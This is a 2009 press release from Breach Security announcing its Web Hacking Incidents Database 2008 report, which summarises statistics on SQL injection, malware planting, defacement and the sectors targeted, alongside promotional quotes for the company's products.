SQL Injection Attacks Planting Malware on Web Sites Ranks #1 in Breach Security’s 2008 Web Hacking Incidents Database Report

New Type of SQL Injection Attack Successfully Compromised More Than 500,000 Web Sites Last Year, According to Report

CARLSBAD, Calif., Feb. 24, 2009 — Breach Security, Inc., the leader in web application integrity, security and PCI compliance, today announced that web attackers unleashed a new type of SQL injection attack in 2008 that successfully compromised more than 500,000 web sites, according to its Web Hacking Incidents Database (WHID) 2008 Annual Report. Marking a major event for the web application security landscape, the report found that SQL injection attacks planting malware on target web sites was the number one security attack for online criminals last year.

Breach’s WHID report also noted a shift in attack methodology in which hackers focused more on a web site’s large customer base in 2008, instead of targeting sensitive information within the web site’s database. This attack method turns a web site into a malware launching point when legitimate users visit the site. The report highlights one important factor – the unknown. Twenty-nine percent of the incidents were reported without specifying the attack method. This lack of attack vector confirmation may be attributed to a combination of two main factors: lack of visibility of web traffic and resistance to public disclosure.

The 2008 WHID report identified multiple hacking-for-profit mechanisms. In fact, 19 percent of attacks were aimed at stealing personal information. Traded easily on the Internet, personal records are the easiest virtual commodity to exchange for money. In addition, the report found that criminals also exploited web sites for financial gain via planting malware and phishing, which comprised 16 percent and 5 percent of attacks in 2008, respectively.

“Breach’s 2008 WHID report illustrates how the web application security landscape is continually changing. Hackers are becoming more savvy and utilizing new mechanisms for personal and financial gain,” said Ryan Barnett, director of application security research for Breach Security. “It’s nearly impossible for online retailers and other companies with a web presence to keep up with the latest attack vehicles in the absence of a web application security device. The changing nature of web application layer attacks further demonstrates the need for and validity of Breach’s security technology and expertise.”

Breach’s WHID report found that financial gain is not the only motivation for online attacks. The number one attack goal in 2008 was web site defacement. Used primarily to target political parties, candidates and government departments, ideologists often defaced a web site with a very specific message related to a campaign.

Corresponding with the ideology driven defacement noted in 2008, the WHID report also found that “Government, Security and Law Enforcement,” at 32 percent, was the top vertical market targeted by attackers. Internet-related organizations topped the list on the commercial side, including retail shops comprising mostly e-commerce sites, media companies and pure internet services such as search engines and service providers. In addition, financial institutions rose sharply in 2008 moving up to fourth place.

“The 2008 WHID report findings prove that no company or market sector is immune from attack. Even organizations with no financial data to lose can become victims of defacement,” said Barnett. “The rules of web application security are changing and a top-ranked web application security provider can protect organizations against the latest threats to their online security.”

The WHID is a project dedicated to maintaining a record of web application-related security incidents. The WHID’s purpose is to serve as a tool for raising awareness of web application security problems and provide information for statistical analysis of web application security incidents. Unlike other resources covering web site security – which focus on the technical aspect of the incident – the WHID focuses on the impact of the attack. To download a copy of Breach’s 2008 WHID annual report, please visit  www.breach.com/resources/whitepapers/2008WHID.html.

About Breach Security
Breach Security, Inc. is the leading provider of real-time, continuous web application integrity, security and compliance that protects sensitive web-based information. Breach Security’s products protect web applications from hacking attacks and data leakage, and ensure applications operate as intended. The company’s products are trusted by thousands of organizations around the world, including leaders in finance, healthcare, ecommerce, travel and government. For more information, please visit www.breach.com.